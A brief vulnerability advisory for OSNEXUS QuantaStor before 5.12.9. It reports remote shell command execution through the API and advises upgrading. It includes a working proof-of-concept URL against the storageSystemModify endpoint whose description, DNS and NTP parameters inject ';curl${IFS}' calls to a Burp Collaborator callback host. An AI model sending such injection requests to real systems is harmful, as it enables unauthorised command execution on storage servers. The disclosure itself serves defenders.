Advisory

Upgrade to the latest version of OSNexus Quantastor;

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9. It allows remote execution of arbitrary shell commands via the API.

http://192.168.1.154/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;curl${IFS}4nse5goajfvot3dc69552liax13urj.burpcollaborator.net&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;curl${IFS}4nse5goajfvot3dc69552liax13urj.burpcollaborator.net&externalHostName=&newNTPServerList=;curl${IFS}4nse5goajfvot3dc69552liax13urj.burpcollaborator.net